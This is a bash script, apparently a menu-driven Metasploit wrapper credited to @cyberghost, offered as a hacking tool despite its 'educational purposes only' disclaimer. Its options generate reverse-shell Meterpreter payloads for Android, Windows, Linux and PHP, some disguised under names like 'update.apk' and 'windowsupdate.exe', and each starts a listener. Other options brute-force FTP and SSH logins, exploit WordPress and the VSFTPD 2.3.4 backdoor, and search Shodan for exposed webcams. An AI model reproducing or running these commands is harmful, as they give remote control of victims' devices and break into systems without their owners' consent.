#!/bin/bash
#This Script Was Made By @cyberghost

clear


echo -e $blue"                                       ..:::::::::.."
echo -e $blue"                                  ..:::aad8888888baa:::.."
echo -e $blue"                               .::::d:?88888888888?::8b::::."
echo -e $blue"                             .:::d8888:?88888888??a888888b:::."
echo -e $blue"                           .:::d8888888a8888888aa8888888888b:::."
echo -e $blue"                          ::::dP::::::::88888888888::::::::Yb::::"
echo -e $blue"                         ::::dP:::::::::Y888888888P:::::::::Yb::::"
echo -e $blue"                        ::::d8:::::::::::Y8888888P:::::::::::8b::::"
echo -e $blue"                       .::::88::::::::::::Y88888P::::::::::::88::::."
echo -e $blue"                       :::::Y8baaaaaaaaaa88P:T:Y88aaaaaaaaaad8P:::::"
echo -e $blue"                      :::::::Y88888888888P::|::Y88888888888P:::::::"
echo -e $blue"                      ::::::::::::::::888:::|:::888::::::::::::::::"
echo -e $blue"                       ::::::::::::::::8888888888888b:::::::::::::::"
echo -e $blue"                       :::::::::::::::88888888888888::::::::::::::"
echo -e $blue"                         :::::::::::::888888888888888:::::::::::::"
echo -e $blue"                          ::::::::::::88::88::88:::88::::::::::::"
echo -e $blue"                           :::::::::::88::88::88:::88:::::::::::"
echo -e $blue"                             :::::::::88::88::88:::88:::::::::"
echo -e $blue"                               :::::::88::88:::::::88:::::::"
echo -e $blue"                                  :::::::::::::::::::::::"
echo -e $blue"                                       :::::::::::::"

echo -e '\e[0;31m

 ▄████████ ▄██   ▄   ▀█████████▄     ▄████████    ▄████████ ████████▄   ▄██████▄   ▄██████▄     ▄████████
███    ███ ███   ██▄   ███    ███   ███    ███   ███    ███ ███   ▀███ ███    ███ ███    ███   ███    ███
███    █▀  ███▄▄▄███   ███    ███   ███    █▀    ███    ███ ███    ███ ███    ███ ███    ███   ███    ███
███        ▀▀▀▀▀▀███  ▄███▄▄▄██▀   ▄███▄▄▄      ▄███▄▄▄▄██▀ ███    ███ ███    ███ ███    ███  ▄███▄▄▄▄██▀
███        ▄██   ███ ▀▀███▀▀▀██▄  ▀▀███▀▀▀     ▀▀███▀▀▀▀▀   ███    ███ ███    ███ ███    ███ ▀▀███▀▀▀▀▀
███    █▄  ███   ███   ███    ██▄   ███    █▄  ▀███████████ ███    ███ ███    ███ ███    ███ ▀███████████
███    ███ ███   ███   ███    ███   ███    ███   ███    ███ ███   ▄███ ███    ███ ███    ███   ███    ███
████████▀   ▀█████▀  ▄█████████▀    ██████████   ███    ███ ████████▀   ▀██████▀   ▀██████▀    ███    ███
                                                 ███    ███                                    ███    ███
                                                                    This tool is for educational purposes only \e[0;31m
                                                  \e[1;34m
      ___________________________________________________________________________________________
      |                                                                                         |
      |  {@} Coded By CyberGhost                                                           {@}  |
      |  {@} Youtube  - https://www.youtube.com/channel/UCcbkV_EimZpPihtVvGVcf_A/featured  {@}  |
      |  {@} Github   - https://github.com/AnonymousAt3                                    {@}  |
      |_________________________________________________________________________________________|

\e[1;33m
                                    >>>>>>>>>>>>>>>>   MENU   <<<<<<<<<<<<<<<<<<

{1} Android      >>  payload generator
{2} Windows      >>  payload generator
{3} Linux        >>  payload generator
{4} PHP          >>  php reverse shell(Remote File Inclusion)
{5} FTP          >>  bruteforce with metasploit
{6} SSH          >>  bruteforce with metasploit
{7} WordPress    >>  exploiting wordpress website
{8} FTP Backdoor >>  VSFTPD v2.3.4 backdoor command execution
{9} IP Cameras   >>  exploit cctv cameras \e[0;31m
{10} Disclaimer
\e[1;33m
Select the number
'

service postgresql start

android='1'
windows='2'
linux='3'
php='4'
ftp='5'
ssh='6'
wp='7'
ftpb='8'
cctv='9'
des='10'


read a

if [ "$a" == "$android" ]
then

clear

echo -e ' \e[0;32m

                    .*                 *
                      *,**************,
                   ***********************
                 *****   **********,   *****
               .*******.*************,*******
               *******************************

       ****   ,*******************************.   ****
     ,******  ,*******************************.  ******.
     ,******  ,*******************************.  ******.
     ,******  ,*******************************.  ******.
     ,******  ,*******************************.  ******.
     ,******  ,*******************************.  ******.
     ,******  ,*******************************.  ******.
     ,******  ,*******************************.  ******.
       ***,   ,*******************************.   ****
              ,*******************************.
               *******************************
                 ***************************
                     ******       ******
                     ******       ******
                     ******       ******
                     ******       ******
                                                Coded By @CyberGhost
                                               \e[0m
\e[1;33m
'
echo "Enter LHOST : "

read ip

echo "Enter LPORT : "

read port




msfvenom -p android/meterpreter/reverse_tcp lhost=$ip lport=$port R > /root/Desktop/update.apk

echo -e '

  ++++++ payload save /root/Desktop/update.apk ++++++

'

msfconsole -q -x "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp;  set lhost $ip ; set lport $port ; exploit ; "



read a

elif [ "$a" == "$windows" ]
then
clear

echo -e ' \e[1;34m

$$\      $$\ $$\                 $$\
$$ | $\  $$ |\__|                $$ |
$$ |$$$\ $$ |$$\ $$$$$$$\   $$$$$$$ | $$$$$$\  $$\  $$\  $$\  $$$$$$$\
$$ $$ $$\$$ |$$ |$$  __$$\ $$  __$$ |$$  __$$\ $$ | $$ | $$ |$$  _____|
$$$$  _$$$$ |$$ |$$ |  $$ |$$ /  $$ |$$ /  $$ |$$ | $$ | $$ |\$$$$$$\
$$$  / \$$$ |$$ |$$ |  $$ |$$ |  $$ |$$ |  $$ |$$ | $$ | $$ | \____$$\
$$  /   \$$ |$$ |$$ |  $$ |\$$$$$$$ |\$$$$$$  |\$$$$$\$$$$  |$$$$$$$  |
\__/     \__|\__|\__|  \__| \_______| \______/  \_____\____/ \_______/
                                                                           Coded By @CyberGhost
                                                                           \e[0m
\e[1;33m
'



echo "Enter LHOST : "

read ip

echo "Enter LPORT : "

read port


msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe lhost=$ip lport=$port -o /root/Desktop/windowsupdate.exe

echo -e '

  ++++++ payload save /root/Desktop/windowsupdate.exe ++++++

'
msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost $ip ; set lport $port ; exploit ; "



read a

elif [ "$a" == "$linux" ]
then

clear

echo -e ' \e[1;37m
 __        __
|  \      |  \
| $$       \$$ _______   __    __  __    __
| $$      |  \|       \ |  \  |  \|  \  /  \
| $$      | $$| $$$$$$$\| $$  | $$ \$$\/  $$
| $$      | $$| $$  | $$| $$  | $$  >$$  $$
| $$_____ | $$| $$  | $$| $$__/ $$ /  $$$$\
| $$     \| $$| $$  | $$ \$$    $$|  $$ \$$\
 \$$$$$$$$ \$$ \$$   \$$  \$$$$$$  \$$   \$$
                                                  Coded By @CyberGhost
                                                   \e[0m
\e[1;33m
'

echo "Enter LHOST : "

read ip

echo "Enter LPORT : "

read port

msfvenom -p python/meterpreter/reverse_tcp lhost=$ip lport=$port > /root/Desktop/linuxupdate.py

echo -e '

++++++ payload save /root/Desktop/linuxupdate.py ++++++

'

msfconsole -q -x "use exploit/multi/handler; set payload python/meterpreter/reverse_tcp; set lhost $ip ; set lport $port ; exploit ; "




read a

elif [ "$a" == "$php" ]
then

clear

echo -e ' \e[0;33m

                                                                                      $$\                 $$\ $$\
                                                                                      $$ |                $$ |$$ |
 $$$$$$\   $$$$$$\ $$\    $$\  $$$$$$\   $$$$$$\   $$$$$$$\  $$$$$$\         $$$$$$$\ $$$$$$$\   $$$$$$\  $$ |$$ |
$$  __$$\ $$  __$$\\$$\  $$  |$$  __$$\ $$  __$$\ $$  _____|$$  __$$\       $$  _____|$$  __$$\ $$  __$$\ $$ |$$ |
$$ |  \__|$$$$$$$$ |\$$\$$  / $$$$$$$$ |$$ |  \__|\$$$$$$\  $$$$$$$$ |      \$$$$$$\  $$ |  $$ |$$$$$$$$ |$$ |$$ |
$$ |      $$   ____| \$$$  /  $$   ____|$$ |       \____$$\ $$   ____|       \____$$\ $$ |  $$ |$$   ____|$$ |$$ |
$$ |      \$$$$$$$\   \$  /   \$$$$$$$\ $$ |      $$$$$$$  |\$$$$$$$\       $$$$$$$  |$$ |  $$ |\$$$$$$$\ $$ |$$ |
\__|       \_______|   \_/     \_______|\__|      \_______/  \_______|      \_______/ \__|  \__| \_______|\__|\__|
                                                                                                                   Coded By @CyberGhost
                                                                                                                    \e[0m
\e[1;33m
'

echo "Enter LHOST : "

read ip

echo "Enter LPORT : "

read port


msfvenom -p php/meterpreter/reverse_tcp lhost=$ip lport=$port -f raw > /root/Desktop/shell.php

echo -e '

++++++ PHP shell save /root/Desktop/Desktop/shell.php ++++++

'

msfconsole -q -x "use exploit/multi/handler; set payload php/meterpreter/reverse_tcp; set lhost $ip ; set lport $port ; exploit ; "



read a

elif [ "$a" == "$ftp" ]
then

clear

echo -e ' \e[1;32m

 ____  ____  ____    ____  ____  __  __  ____  ____    ____  _____  ____   ___  ____
( ___)(_  _)(  _ \  (  _ \(  _ \(  )(  )(_  _)( ___)  ( ___)(  _  )(  _ \ / __)( ___)
 )__)   )(   )___/   ) _ < )   / )(__)(   )(   )__)    )__)  )(_)(  )   /( (__  )__)
(__)   (__) (__)    (____/(_)\_)(______) (__) (____)  (__)  (_____)(_)\_) \___)(____)
                                                                                       Coded By @CyberGhost
                                                                                        \e[0m
\e[1;33m
'
echo "Enter RHOSTS : "

read  RHOSTS

echo "Enter username list file path : "
read username

echo "Enter password list file path : "
read password



msfconsole -q -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS $RHOSTS ; set USER_FILE $username ; set PASS_FILE $password ; exploit ; "



read a

elif [ "$a" == "$ssh" ]
then

clear

echo -e ' \e[0;32m

  _________ _________ ___ ___   ___.                 __             _____
 /   _____//   _____//   |   \  \_ |_________ __ ___/  |_  ____   _/ ____\___________   ____  ____
 \_____  \ \_____  \/    ~    \  | __ \_  __ \  |  \   __\/ __ \  \   __\/  _ \_  __ \_/ ___\/ __ \
 /        \/        \    Y    /  | \_\ \  | \/  |  /|  | \  ___/   |  | (  <_> )  | \/\  \__\  ___/
/_______  /_______  /\___|_  /   |___  /__|  |____/ |__|  \___  >  |__|  \____/|__|    \___  >___  >
        \/        \/       \/        \/                       \/                           \/    \/

                                                                                 Coded By @CyberGhost
                                                                                     \e[0m
\e[1;33m
'
echo "Enter RHOSTS : "

read  RHOSTS

echo "Enter username list file path : "
read username

echo "Enter password list file path : "
read password


msfconsole -q -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS $RHOSTS ; set USER_FILE $username ; set PASS_FILE $password ; exploit ; "



read a

elif [ "$a" == "$wp" ]
then

clear

echo -e ' \e[0;34m



                              *(####(////(####/.
                        .##/                      ##(
                     ##,    .###################(     (#,
                  *#.   ,############################    (#
                /#   .##############################       ,#
              .#.  ,###############################          (#
             /#            *###.             /#####            #
            /#  .        ##########        #########        #   #
            #   ##       .##########       .#########*      ##  .#
           #*  (###       ,##########       *#########*    (##.  #,
           #   #####       /##########       /#########   .###/  /(
           #   ######       #########,        ########(  .####(  /(
           #.  #######       #######/  #       #######   #####,  #/
           *#  .######(       #####(  ##/       #####.  ######   #
            #*  *######*       ####  ####,       ###*  ######   #*
             #*  ,######*      .##  ######,      .##  (#####   #*
              (#   ######,      /. /#######.      (  /####/   #.
                #*   #####.       *#########        *###(   ##
                  #/   ,###      .###########      .##    ##
                    (#,    /     #############         (#,
                       ,##.      .*#######(,       /##
                            /###/.          .####.
                                                                    Coded By @CyberGhost
                                                                         \e[0m

\e[1;33m
'
echo "Enter RHOSTS : "
read rhost

echo "Enter wordpress username : "
read username

echo "Enter wordpress password : "
read password

echo "Enter LHOST :"
read lhost


msfconsole -q -x "use exploit/multi/http/wp_crop_rce; set RHOSTS $rhost ; set USERNAME $username ; set PASSWORD $password ; set LHOST $lhost ; exploit ; "


read a

elif [ "$a" == "$ftpb" ]
then

clear

echo -e ' \e[1;30m

$$\    $$\  $$$$$$\  $$$$$$$$\ $$$$$$$$\ $$$$$$$\  $$$$$$$\
$$ |   $$ |$$  __$$\ $$  _____|\__$$  __|$$  __$$\ $$  __$$\
$$ |   $$ |$$ /  \__|$$ |         $$ |   $$ |  $$ |$$ |  $$ |
\$$\  $$  |\$$$$$$\  $$$$$\       $$ |   $$$$$$$  |$$ |  $$ |
 \$$\$$  /  \____$$\ $$  __|      $$ |   $$  ____/ $$ |  $$ |
  \$$$  /  $$\   $$ |$$ |         $$ |   $$ |      $$ |  $$ |
   \$  /   \$$$$$$  |$$ |         $$ |   $$ |      $$$$$$$  |
    \_/     \______/ \__|         \__|   \__|      \_______/
                                                               Coded By @CyberGhost
                                                               \e[0m
\e[1;33m
'

echo "Enter RHOSTS : "
read RHOSTS

msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS $RHOSTS ; exploit ;"


read a
elif [ "$a" == "$des" ]
then

echo -e "\e[0;31mThis tool is for educational purposes only. Any activity or activity related to the information contained herein is solely your responsibility. Misuse of the information contained herein can result in criminal charges against suspected persons Developers are not responsible for any damage caused by this script.\e[0m"


read a
elif [ "$a" == "$cctv" ]
then

clear
echo -e ' \e[1;37m

                                          @@@@@@@@@@@@@@@@@@@@@@@@
                                    @@@@@@@@@@@@@@@@@@@@@@@@@@@& @@
                              @@@@@@@@@@@@@@@@@@@@@@@@@@@@@% @@@@@@@
                        @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@% @@@@@@@@&
                  .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@( @@@@@@@@@@ @@
             @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@( @@@@@@@@@@@@@@@@@@
       ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/ @@@@@@@@@@@@@@@@@@@@.
    @@@@@@@@&                       @@@, @@@@@@@@@@@@@@@@@@@ @@
    .@@@@@@@@    %@@@@@@@@@@@@@@@@    @@@@@@@@@@@@@@@@@@@.@@
     (@@@@@@@    @@@@@@@@@@@@@@@@@@    @@@@@@@@@@@@@@@@%@#
      /@@@@@@    @@@@@@@ %@@@&@@@@@     @@@@@@@@@@@@ @@
        @@@@@,    @@@@@@@@@@@@@@@@@/     @@@@@@@@ @@
         @@@@@    @@@@@@ @@@ @@@@@@@      @@@@@%@@
             %    @@@@@@@@@@@@@@@@@@       @ @@                    @@@@@@@/@@
              @                          *@@%                     @@@@@@@#@@@,
                                 .#@@@@@@@@@                      @@@@@@&@@@@*
                                   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@(
                                   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@#
                                   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@%
                                   @@@@@@@@@@#,                   ,@@@@@ @@@@&
                                       .                           @@@@@%@@@@@
                                                                    @@@@@#@@@@
                                                                        #@&@@#
                                                                               Coded By @CyberGhost
                                                                               \e[0m
\e[1;33m
'
echo "Enter your shodan api_key : "
read api


msfconsole -q -x "use auxiliary/gather/shodan_search; set SHODAN_APIKEY $api ; set QUERY "webcamxp" ; exploit ; "




fi

















